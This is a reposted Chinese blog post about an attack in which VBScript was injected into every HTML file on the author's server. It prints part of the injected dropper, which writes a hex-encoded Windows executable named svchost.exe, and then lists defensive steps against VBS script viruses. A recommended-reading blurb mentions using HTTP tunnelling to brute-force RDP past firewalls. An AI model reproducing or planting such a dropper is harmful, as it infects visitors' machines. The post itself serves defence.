热门标签 | HotTags
当前位置:  开发笔记 > 编程语言 > 正文

怎样防范vbs脚本病毒

https:blog.csdn.netpersistencegoingarticledetails84376427大早上,发现服务器被人攻击了,所有的

https://blog.csdn.net/persistencegoing/article/details/84376427

大早上,发现服务器被人攻击了,所有的 html 都被植入了一段 Vbscript

<html>

        <head>

                <meta http-equiv&#61;"content-type" content&#61;"text/html;charset&#61;utf-8" />

                <title>这是网页标题title>

        head>

        <body>body>

html><SCRIPT Language&#61;Vbscript>

DropFileName &#61; "svchost.exe"

WriteData &#61; "4D5A90000300000004000000FFFF0000B80000000000000040000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000504500004C010300BC7CB1470000000000000000E0000F010B01070400E000000010000000E0010030C0020000F0010000D002000000400000100000000200000A00000008000100040000000000000000E002000010000000000000020000000000100000100000000010000010000000000000100000000000000000000000E8D402001001000000D00200E80400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000555058300000000000E00100001000000000000000040000000000000000000000000000800000E0555058310000000000E0000000F0010

 

这是部分代码

vbs病毒是使用Vbscript编写的&#xff0c;因为编写简单&#xff0c;经常被用到。那么&#xff0c;怎样防范vbs脚本病毒呢&#xff1f;一起了解下吧。

怎样防范vbs脚本病毒

 

1)禁用文件系统对象FileSystemObject

方法&#xff1a;用regsvr32scrrun.dll/u这条命令就可以禁止文件系统对象。其中regsvr32是Windows\System下的可执行文件。或者直接查找scrrun.dll文件删除或者改名。

还有一种方法就是在注册表中HKEY_CLASSES_ROOT\CLSID\下找到一个主键{0D43FE01-F093-11CF-8940-00A0C9054228}的项&#xff0c;咔嚓即可。

2)卸载WindowsScriptingHost

在Windows98中(NT4.0以上同理)&#xff0c;打开[控制面板]→[添加/删除程序]→[Windows安装程序]→[附件]&#xff0c;取消“WindowsScriptingHost”一项。

和上面的方法一样&#xff0c;在注册表中HKEY_CLASSES_ROOT\CLSID\下找到一个主键{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}的项&#xff0c;咔嚓。

3)删除VBS、VBE、JS、JSE文件后缀名与应用程序的映射

点击[我的电脑]→[查看]→[文件夹选项]→[文件类型]&#xff0c;然后删除VBS、VBE、JS、JSE文件后缀名与应用程序的映射。

4)在Windows目录中&#xff0c;找到WScript.exe&#xff0c;更改名称或者删除

如果你觉得以后有机会用到的话&#xff0c;最好更改名称好了&#xff0c;当然以后也可以重新装上。

5)要彻底防治VBS网络蠕虫病毒&#xff0c;还需设置一下你的浏览器

我们首先打开浏览器&#xff0c;单击菜单栏里“Internet选项”安全选项卡里的[自定义级别]按钮。把“ActiveX控件及插件”的一切设为禁用&#xff0c;这样就不怕了。呵呵&#xff0c;譬如新欢乐时光的那个ActiveX组件如果不能运行&#xff0c;网络传播这项功能就玩完了。

6)禁止OE的自动收发邮件功能

7)由于蠕虫病毒大多利用文件扩展名作文章&#xff0c;所以要防范它就不要隐藏系统中已知文件类型的扩展名

Windows默认的是“隐藏已知文件类型的扩展名称”&#xff0c;将其修改为显示所有文件类型的扩展名称。

8)将系统的网络连接的安全级别设置至少为“中等”

它可以在一定程度上预防某些有害的Java程序或者某些ActiveX组件对计算机的侵害。

最后友情提醒&#xff0c;预防vbs脚本病毒&#xff0c;杀毒软件确实很必要&#xff0c;尽管有些杀毒软件挺让广大用户失望&#xff0c;不过&#xff0c;选择是双方的哦。在这个病毒横飞的网络&#xff0c;如果您的机器没有装上杀毒软件我觉得确实挺不可思议的。

 

希望大家关注我一波,防止以后迷路,有需要的可以加群讨论互相学习java ,学习路线探讨,经验分享与java求职      群号:721515304

 

 


推荐阅读
  • 解决 Windows Server 2016 网络连接问题
    本文详细介绍了如何解决 Windows Server 2016 在使用无线网络 (WLAN) 和有线网络 (以太网) 时遇到的连接问题。包括添加必要的功能和安装正确的驱动程序。 ... [详细]
  • 网站访问全流程解析
    本文详细介绍了从用户在浏览器中输入一个域名(如www.yy.com)到页面完全展示的整个过程,包括DNS解析、TCP连接、请求响应等多个步骤。 ... [详细]
  • 本文详细介绍了如何解决DNS服务器配置转发无法解析的问题,包括编辑主配置文件和重启域名服务的具体步骤。 ... [详细]
  • javascript分页类支持页码格式
    前端时间因为项目需要,要对一个产品下所有的附属图片进行分页显示,没考虑ajax一张张请求,所以干脆一次性全部把图片out,然 ... [详细]
  • 本文介绍了如何利用HTTP隧道技术在受限网络环境中绕过IDS和防火墙等安全设备,实现RDP端口的暴力破解攻击。文章详细描述了部署过程、攻击实施及流量分析,旨在提升网络安全意识。 ... [详细]
  • 秒建一个后台管理系统?用这5个开源免费的Java项目就够了
    秒建一个后台管理系统?用这5个开源免费的Java项目就够了 ... [详细]
  • 您的数据库配置是否安全?DBSAT工具助您一臂之力!
    本文探讨了Oracle提供的免费工具DBSAT,该工具能够有效协助用户检测和优化数据库配置的安全性。通过全面的分析和报告,DBSAT帮助用户识别潜在的安全漏洞,并提供针对性的改进建议,确保数据库系统的稳定性和安全性。 ... [详细]
  • 2009年12月28日,易语言公司正式推出了“易语言5.0静态编译测试版1”,这一版本标志着易语言在技术上的重要突破。与之前的4.x版本相比,5.0测试版1引入了静态编译功能,显著提升了程序的运行效率和安全性。此外,新版本还优化了代码生成机制,增强了语言的表达能力和兼容性。自发布以来,用户反馈非常积极,普遍认为新功能带来了更加流畅的开发体验。 ... [详细]
  • 本文回顾了作者初次接触Unicode编码时的经历,并详细探讨了ASCII、ANSI、GB2312、UNICODE以及UTF-8和UTF-16编码的区别和应用场景。通过实例分析,帮助读者更好地理解和使用这些编码。 ... [详细]
  • 本文最初发表在Thorben Janssen的Java EE博客上,每周都会分享最新的Java新闻和动态。 ... [详细]
  • php更新数据库字段的函数是,php更新数据库字段的函数是 ... [详细]
  • 开机自启动的几种方式
    0x01快速自启动目录快速启动目录自启动方式源于Windows中的一个目录,这个目录一般叫启动或者Startup。位于该目录下的PE文件会在开机后进行自启动 ... [详细]
  • 本文总结了一些开发中常见的问题及其解决方案,包括特性过滤器的使用、NuGet程序集版本冲突、线程存储、溢出检查、ThreadPool的最大线程数设置、Redis使用中的问题以及Task.Result和Task.GetAwaiter().GetResult()的区别。 ... [详细]
  • 本文深入解析了 Kubernetes 控制平面(特别是 API 服务器)与集群节点之间的通信机制,并对其通信路径进行了详细分类。旨在帮助用户更好地理解和定制其安装配置,从而增强网络安全性,确保集群的稳定运行。 ... [详细]
  • 在JavaWeb开发中,文件上传是一个常见的需求。无论是通过表单还是其他方式上传文件,都必须使用POST请求。前端部分通常采用HTML表单来实现文件选择和提交功能。后端则利用Apache Commons FileUpload库来处理上传的文件,该库提供了强大的文件解析和存储能力,能够高效地处理各种文件类型。此外,为了提高系统的安全性和稳定性,还需要对上传文件的大小、格式等进行严格的校验和限制。 ... [详细]
author-avatar
笑竹舞
这个家伙很懒,什么也没留下!
PHP1.CN | 中国最专业的PHP中文社区 | DevBox开发工具箱 | json解析格式化 |PHP资讯 | PHP教程 | 数据库技术 | 服务器技术 | 前端开发技术 | PHP框架 | 开发工具 | 在线工具
Copyright © 1998 - 2020 PHP1.CN. All Rights Reserved | 京公网安备 11010802041100号 | 京ICP备19059560号-4 | PHP1.CN 第一PHP社区 版权所有